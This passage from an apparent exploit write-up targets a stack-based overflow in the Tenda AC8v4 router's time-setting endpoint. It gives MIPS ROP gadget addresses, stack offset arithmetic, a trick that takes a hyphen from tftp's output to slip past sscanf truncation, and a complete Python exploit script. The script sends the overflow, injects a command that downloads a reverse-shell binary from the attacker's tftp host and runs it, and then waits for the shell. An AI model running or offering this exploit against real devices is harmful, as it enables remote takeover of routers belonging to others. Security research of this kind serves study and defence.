Both 0x0007E8C8 and 0x0007EB5C do contain the Action and Control Jump parts that mipsrop reported, but the gadget we jump to also contains other instructions between them. For example, here $s0-$s5 are also loaded from stack content that we overflowed. Most importantly, the $sp modification in the delay slot (addiu $sp, 0x60) still executes after jr $ra (loaded from 0x44+var_s18($sp)). This means every later offset in our payload has to be recomputed to account for the raising or lowering of $sp caused by the previous gadget. For instance, our next gadget is 0x0001B014, move $t9,$s4; jr 0x1C+var_s18($sp), and $sp has already been raised by 0x60, so its jump target actually lives at sp_offset + 0x60 + 0x1C + 0x18 = sp_offset + 0x60 + 0x34. The same goes for this gadget1, which itself moves $sp by another +0x38:

LOAD:0001B014                 move    $t9, $s4
LOAD:0001B018                 lw      $ra, 0x1C+var_s18($sp)
LOAD:0001B01C                 lw      $s5, 0x1C+var_s14($sp)
LOAD:0001B020                 lw      $s4, 0x1C+var_s10($sp)
LOAD:0001B024                 lw      $s3, 0x1C+var_sC($sp)
LOAD:0001B028                 lw      $s2, 0x1C+var_s8($sp)
LOAD:0001B02C                 lw      $s1, 0x1C+var_s4($sp)
LOAD:0001B030                 lw      $s0, 0x1C+var_s0($sp)
LOAD:0001B034                 jr      $ra
LOAD:0001B038                 addiu   $sp, 0x38

At this point we can reconstruct our payload with new $sp offsets determined by the call sequence of these gadgets, which gives us this ROP chain: lw $s4,0x48($sp); jr 0x5C($sp) -> move $t9,$s4; jr 0x34($sp) -> addiu $a0,$sp,0x24+var_C; jr 0x24($sp), with the following $sp values:

  • sp_offset -> 0x7f: defined at sink.

  • sp2 -> 0x60 : addiu $sp, 0x60.

  • sp3 -> 0x38 : addiu $sp, 0x38.

        _payload = {
                ret_offset: libc_base + lw_s4_0x48_JR_5Csp, # gad0
                (sp_offset + 0x48): t9_target,
                (sp_offset + 0x38 + 0x18): f'{c2}'.encode(), # $s6, 0x38+var_s18($sp)
                (sp_offset + 0x5c): libc_base + t9_EQ_s4_JR_1C_p_18, # gad1
                (sp_offset + 0x60 + 0x1C + 0x10): f'{c1}'.encode(), 
                 # flow2 $s4-$s5 (caller), this is set via previous control-ed registers
                (sp_offset + 0x60 + 0x34): libc_base + a0_EQ_sp24_c_JR_24sp, 
                (sp_offset + 0x60 + 0x38 + 0x24): libc_base + _system, # gad2
                (sp_offset + 0x60 + 0x38 + 0x24 + 0xC - 0x7): f'$({c3});'.encode()
        }

For some mysterious reason, system() also seems to take its argument from $s4-$s6: $s4-$s5 are set as a side effect of t9_EQ_s4_JR_1C_p_18 (move $t9, $s4), and $s6 is set as a side effect of lw_s4_0x48_JR_5Csp at the stack offset 0x38+var_s18($sp), which lets us execute an 8-byte command via system(). Nevertheless, since $a0 is set by the third gadget, a0_EQ_sp24_c_JR_24sp, to point at the offset sp_offset + 0x60 + 0x38 + 0x24 + 0xC - 0x7, we can execute a command of arbitrary length!
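
To make the offset-keyed payload dictionary more concrete, here is a minimal stand-in for what pwntools' flat() does when it is given a dict mapping offsets to values. It is a sketch under assumptions: the helper name lay_out is invented, gaps are filled with b"A" instead of the cyclic pattern flat() uses by default, and the command $(id); is only a placeholder.

```python
import struct

def lay_out(chunks, filler=b"A"):
    """Place each value at its byte offset; ints become 32-bit little-endian words."""
    blobs = {off: (struct.pack("<I", v) if isinstance(v, int) else v)
             for off, v in chunks.items()}
    size = max(off + len(b) for off, b in blobs.items())
    buf = bytearray(filler * size)
    for off, b in sorted(blobs.items()):
        buf[off:off + len(b)] = b
    return bytes(buf)

sp_offset = 0x7F
# Offset of the command string that $a0 ends up pointing at (formula from the payload above)
cmd_offset = sp_offset + 0x60 + 0x38 + 0x24 + 0xC - 0x7

demo = lay_out({
    0x7B: 0x77F59000 + 0x0007E8C8,  # ret_offset -> libc_base + first gadget
    cmd_offset: b"$(id);",          # placeholder command
})
print(hex(cmd_offset), len(demo))
print(demo[0x7B:0x7F].hex())
```

Everything between the keyed offsets is padding, which is why only the offsets listed in the dictionary have to be computed precisely.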


Aftermath: Wget-less and Hyphen-less

At this point, executing arbitrary commands on the Tenda Ac8v4 Router is an easy-peasy task for us. Nevertheless, if you ever log into the QEMU VM that was created for this router's file system, you will find there is pretty much nothing we can run; even scp and wget don't exist in busybox. So how can we create a reverse shell back to our machine? Well, the answer still hides in busybox:

Currently defined functions:
    [[, adduser, arp, ash, awk, brctl, cat, chmod, cp, date, depmod,
    dev, echo, egrep, env, expr, false, fgrep, free, grep, halt,
    ifconfig, init, insmod, kill, killall, linuxrc, ln, login, ls, lsmod,
    mdev, mkdir, mknod, modprobe, mount, mv, netstat, passwd, ping, ping6,
    poweroff, ps, pwd, reboot, rm, rmdir, rmmod, route, sed, sh, sleep,
    sulogin, sync, tar, telnetd, test, tftp, top, touch, traceroute,
    traceroute6, true, umount, uptime, usleep, vconfig, vi, yes

Among all these fun functions, only one caught my eye: tftp (how ironic, since the only ways for the router itself to communicate with the internet are tftp, telnetd and ping). With tftp, the idea is to build a reverse-shell binary and host it on our own tftp server, then fetch it with the router's tftp binary, after which we can chmod +x and ./RUNIT, creating a reverse shell! How fun is that! To host the tftp server remotely, run sudo apt-get install xinetd tftpd tftp and specify your server_args in /etc/xinetd.d/tftp; you can follow this tutorial.
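
The hunt for a usable transfer tool can also be done mechanically. The snippet below is a small sketch: the applet listing is abridged from the busybox output above, and the wish list of tools in WANTED is my own assumption about what one would normally reach for.

```python
# Applet names as printed by busybox on the target (abridged from the listing above)
listing = "cat, chmod, cp, echo, ping, sh, tar, telnetd, tftp, vi"

# Tools commonly used to pull a file onto a box (assumed wish list)
WANTED = ["wget", "curl", "scp", "nc", "ftpget", "tftp"]

available = {name.strip() for name in listing.split(",")}
usable = [tool for tool in WANTED if tool in available]
print(usable)
```

On this firmware the only match is tftp, which is what the rest of this section builds on.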

This approach seemed really promising, but once you try to fetch the malware, you will find something pretty strange: when we pass the command $(tftp -g -r rs && chmod +x rs && ./rs 9000) in as c3, the ./bin/httpd backend keeps erroring with an unfinished (). Why is that? Well, taking a peek back at our sink, you might understand why (I was confused by this for about 2 hours, as I thought the problem was in my payload, but it was not):

int __fastcall sub_4A79EC(int a1)
  s = (char *)websGetVar(a1, "time", &unk_4F09E0);
  sscanf(s, "%[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s", v6, v8, v10, v12, v14, v16);
  v18.tm_year = atoi((const char *)v6) - 0x76C;
  v18.tm_mon = atoi((const char *)v8) - 1;

If you remember, sub_4A79EC results in a stack-based overflow because it scans s, i.e. (char *)websGetVar(a1, "time", &unk_4F09E0), into v6, v8, v10, v12, v14, v16 with no limit on the boundary, allowing us to construct a payload time=retr0:xxxxx<overflowing_character>xxxxx to cause the overflow. Recall how we described this sscanf as working like a regex: it filters the input through %[^-]-%[^-]-%[^ ] %[^:]:%[^:]:%s, which extracts data shaped like data1:data2:data3 or data1-data2-data3 into v6, v8, v10 and so on, all of which are located on the stack.

Even more dangerously for us, sscanf extracts our data using : or - as the delimiter, and that includes the hyphen of -g in tftp -g -r rs as well! sscanf therefore truncates what it writes into v6, v8, v10, so only the prefix up to the first - is kept and executed, which leaves the () unfinished and makes the command execution fail. So how can we solve the hyphen issue?
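
The truncation is easy to reproduce off-target. The sketch below mimics only the leading %[^-] conversion of the format string with a Python regex (the helper name first_scanset is made up, and the real sscanf of course writes into a fixed stack buffer rather than returning a string):

```python
import re

def first_scanset(s: str) -> str:
    """Mimic what the leading %[^-] conversion stores: everything before the first '-'."""
    m = re.match(r"[^-]+", s)
    return m.group(0) if m else ""

injected = "$(tftp -g -r rs && chmod +x rs && ./rs 9000);"
kept = first_scanset("retr0reg:" + injected)

print(repr(kept))
print("open parens:", kept.count("("), "close parens:", kept.count(")"))
```

What survives ends right after "tftp ", with the $( still open, which matches the unfinished () error from httpd.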

Here I used a pretty fun solution: since bash allows us to save the output of a command and slice it, similar to how Python's [::] works, we can obtain a - from some command's output, save the sliced - in a shell variable, and substitute that variable wherever our payload contains a -. For instance, if you run the command tftp in busybox, this is what it outputs:

BusyBox v1.19.2 (2022-12-20 11:55:28 CST) multi-call binary.

Usage: tftp [OPTIONS] HOST [PORT]

Transfer a file from/to tftp server

    -l FILE    Local FILE
    -r FILE    Remote FILE
    -g    Get file
    -p    Put file
    -b SIZE    Transfer blocks of SIZE

Now, if we save the output via output=$(tftp 2>&1), count the position of the - in -l (which is 47), and save that character into another variable, for instance spec, then whenever we need the character - we can simply prepend output=$(tftp 2>&1);spec=${output:47:1}; to the command and replace every - with a reference to spec. The payload then contains no literal -, so it no longer triggers the truncation in sscanf, and we can specify arguments again, which lets us fetch and execute the downloaded file via $(tftp -g -r rs && chmod +x rs && ./rs 9000)!!!
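
As a sketch, the rewrite can be wrapped in a small helper. The name dehyphenate and the address 192.0.2.10 are placeholders of mine; the prefix and the $(echo $spec) replacement are the same ones the exploit script uses, and the index 47 is the position counted above for this particular BusyBox build.

```python
def dehyphenate(cmd: str, index: int = 47) -> str:
    """Prefix the command with the spec= setup and replace every '-' by $(echo $spec)."""
    prefix = f"output=$(tftp 2>&1);spec=${{output:{index}:1}};"
    return prefix + cmd.replace("-", "$(echo $spec)")

# 192.0.2.10 stands in for the attacker's tftp host
safe = dehyphenate("tftp -g -r rs 192.0.2.10 && chmod +x rs && ./rs 192.0.2.10 9000")
print(safe)
print("contains a literal hyphen:", "-" in safe)
```

Using $(echo $spec) rather than a bare $spec matters: in $specg the shell would look up a variable called specg, whereas $(echo $spec)g expands to -g.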


And now we own the router:)


#!/usr/bin/env python3
# -*- coding: utf-8 -*-

#File: exploit.py
#Author: Patrick Peng (retr0reg)

import requests
import argparse
import threading
from pwn import log, context, flat, listen
from typing import NamedTuple

session = requests.Session()
session.trust_env = False

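def ap():
    parser = argparse.ArgumentParser()
    # Argument names follow the attributes read below (args.host, args.port,
    # args.attacker_host); treating them as positional arguments is an assumption
    parser.add_argument("host", type=str,
                    help="exploiting ip")
    parser.add_argument("port", type=int,
                    help="exploiting port")
    parser.add_argument(
        "attacker_host",
        help="attacker host"
    )
    args = parser.parse_args()
    return ['',f'tftp -g -r rs {args.attacker_host} && chmod +x rs && ./rs {args.attacker_host} 9000'], args.host, args.port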

class RopCmd(NamedTuple):
    first: str   # field name assumed; the command is read from index 1 (ropcmd[1])
    second: str

def pwn(
        ropcmd: RopCmd,
        host: str = '',
        port: int = 80,
    ):

    listener = listen(9000)
    context(arch = 'mips',endian = 'little',os = 'linux')

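    def sink(
        payload: bytes,
    ):
        url = f"http://{host}:{port}/goform/SetSysTimeCfg"
        _payload = b''
        _payload = b'retr0reg' + b":" + payload
        data = {
            # "time" is the parameter the sink reads via websGetVar; any other
            # form fields the handler may expect are not reconstructed here
            "time": _payload,
        }

        def send_request():
            try:
                requests.post(url=url, data=data)
            except Exception as e:
                print(f"Request failed: {e}")

        # Send from a separate thread so a hanging httpd does not block the listener
        thread = threading.Thread(target=send_request)
        thread.start()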

    def _rop(ropcmd: RopCmd):

        # rop-chain:
        # lw $s4 0x48; jr 0x5c
        # move $t9,$s4; jr 0x34($sp)
        # addiu $a0,$sp,0x28+var_C | jr 0x24($sp)

        # 77f59000-77fe5000 r-xp 00000000 08:01 788000 
        libc_base       = 0x77f59000        
        _system         = 0x004E630

        t9_target       = 0x77fa7630
        ret_offset      = 0x7b #  -> b'bgaa'
        sp_offset       = 0x7f # --> b'bhaa'

        sp2             = 0x60  # LOAD:0007EB7C 
        sp3             = 0x38  # LOAD:0001B038 


        log.success("Exploit started!")
        log.info(f"retaddr offset: {hex(ret_offset)}")
        log.info(f"$sp offset: {hex(sp_offset)}")
        log.info(f"libc_base -> {hex(libc_base)}")

        lw_s4_0x48_JR_5Csp    = 0x0007E8C8 # lw $s4,0x38+var_s10($sp) | jr 0x5C($sp)
        # LOAD:0007E8CC                 move    $v0, $s0
        # LOAD:0007E8D0                 lw      $fp, 0x38+var_s20($sp)
        # LOAD:0007E8D4                 lw      $s7, 0x38+var_s1C($sp)
        # LOAD:0007E8D8                 lw      $s6, 0x38+var_s18($sp)
        # LOAD:0007E8DC                 lw      $s5, 0x38+var_s14($sp)
        # LOAD:0007E8E0                 lw      $s4, 0x38+var_s10($sp)
        # LOAD:0007E8E4                 lw      $s3, 0x38+var_sC($sp)
        # LOAD:0007E8E8                 lw      $s2, 0x38+var_s8($sp)
        # LOAD:0007E8EC                 lw      $s1, 0x38+var_s4($sp)
        # LOAD:0007E8F0                 lw      $s0, 0x38+var_s0($sp)
        # LOAD:0007E8F4                 jr      $ra
        # LOAD:0007E8F8                 addiu   $sp, 0x60

        t9_EQ_s4_JR_1C_p_18   = 0x0001B014 # move $t9,$s4             | jr 0x1C+0x18($sp)
        # LOAD:0001B018                 lw      $ra, 0x1C+var_s18($sp)
        # LOAD:0001B01C                 lw      $s5, 0x1C+var_s14($sp)
        # LOAD:0001B020                 lw      $s4, 0x1C+var_s10($sp)
        # LOAD:0001B024                 lw      $s3, 0x1C+var_sC($sp)
        # LOAD:0001B028                 lw      $s2, 0x1C+var_s8($sp)
        # LOAD:0001B02C                 lw      $s1, 0x1C+var_s4($sp)
        # LOAD:0001B030                 lw      $s0, 0x1C+var_s0($sp)
        # LOAD:0001B034                 jr      $ra
        # LOAD:0001B038                 addiu   $sp, 0x38

        a0_EQ_sp24_c_JR_24sp  = 0x0004D144 # addiu $a0,$sp,0x24+var_C | jr 0x24($sp)
        # LOAD:0004D144                 addiu   $a0, $sp, 0x24+var_C
        # LOAD:0004D148                 lw      $ra, 0x24+var_s0($sp)
        # LOAD:0004D14C                 nop
        # LOAD:0004D150                 jr      $ra

        a0_EQ_sp28_c_JR_24sp  = 0x00058920 # addiu $a0,$sp,0x28+var_C | jr 0x24($sp)
        # LOAD:00058920                 addiu   $a0, $sp, 0x28+var_C
        # LOAD:00058924                 lw      $v1, 0x28+var_C($sp)
        # LOAD:00058928                 lw      $ra, 0x28+var_4($sp)
        # LOAD:0005892C                 sw      $v1, 0($s0)
        # LOAD:00058930                 lw      $s0, 0x28+var_8($sp)
        # LOAD:00058934                 jr      $ra

        log.info(f"gadget lw_s4_0x48_JR_5Csp   -> {hex(libc_base + lw_s4_0x48_JR_5Csp)}")
        log.info(f"gadget t9_EQ_s4_JR_1C_p_18  -> {hex(libc_base + t9_EQ_s4_JR_1C_p_18)}")
        log.info(f"gadget a0_EQ_sp24_c_JR_24sp -> {hex(libc_base + a0_EQ_sp24_c_JR_24sp)}")
        log.info(f"_system                     -> {hex(libc_base + _system)}")

        c1 = ""
        c2 = ""

        c3 = "output=$(tftp 2>&1);spec=${output:47:1};" + ropcmd[1].replace('-','$(echo $spec)')

        log.info(f"Inject $a0: {c3}")

        _payload = {
                ret_offset: libc_base + lw_s4_0x48_JR_5Csp, # flow1
                (sp_offset + 0x48): t9_target,
                (sp_offset + 0x38 + 0x18): f'{c2}'.encode(), # $s6, 0x38+var_s18($sp)
                (sp_offset + 0x5c): libc_base + t9_EQ_s4_JR_1C_p_18, # flow2
                (sp_offset + sp2 + 0x1C + 0x10): f'{c1}'.encode(), # flow2 $s4-$s5 (caller), this is set via previous control-ed registers
                (sp_offset + sp2 + 0x34): libc_base + a0_EQ_sp24_c_JR_24sp, 
                (sp_offset + sp2 + sp3 + 0x24): libc_base + _system, # flow3
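                (sp_offset + sp2 + sp3 + 0x24 + 0xC - 0x7): f'$({c3});'.encode()
        }

        log.success("Stack looks like:")
        for key, value in _payload.items():
            try:
                log.info(f"offset: {hex(key)} : {hex(value)}")
            except TypeError:
                # bytes values (the command strings) cannot be passed to hex()
                log.info(f"offset: {hex(key)} : {value}")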

        # $sp growth  -> +0x60 -> 0x38 
        # | retaddr             | lw_s4_0x48_JR_5Csp   |  i. (gadget address) 
        # | (current sp)        |                      |     ($spsz1=0d127)
        # | $sp1+0x48           | t9_target            |  i ->  $s4  
        # | $sp2+0x5c           | t9_EQ_s4_JR_1C_p_18  |  ii <- $t9 ($spsz2+=0x60)
        # | $sp1+$sp2+$sp3-0xC  | command              |  <- $a0
        # | $sp1+$sp2+0x34      | a0_EQ_sp24_c_JR_24sp |  iii. ($spsz3+=38)
        # | $sp1+$sp2+$sp3+0x24 | _system              |  <- jmp

        return flat(_payload)

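    payload = _rop(ropcmd)
    sink(payload)

    # Wait for the reverse shell to connect back on port 9000
    listener.wait_for_connection()
    log.critical("Received shell!")
    listener.interactive()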

if __name__ == "__main__":
    ropcmd, host, port = ap()
    log.info("0reg.dev - retr0reg")
    log.info("Tenda AC8v4 stack-based overflow")
    print(r"""
        __________        __          _______                        
        \______   \ _____/  |________ \   _  \_______   ____   ____  
        |       _// __ \   __\_  __ \/  /_\  \_  __ \_/ __ \ / ___\ 
        |    |   \  ___/|  |  |  | \/\  \_/   \  | \/\  ___// /_/  >
        |____|_  /\___  >__|  |__|    \_____  /__|    \___  >___  / 
                \/     \/                    \/            \/_____/  
    """)
    log.info("RCE via Mipsel ROP")
    pwn(ropcmd, host, port)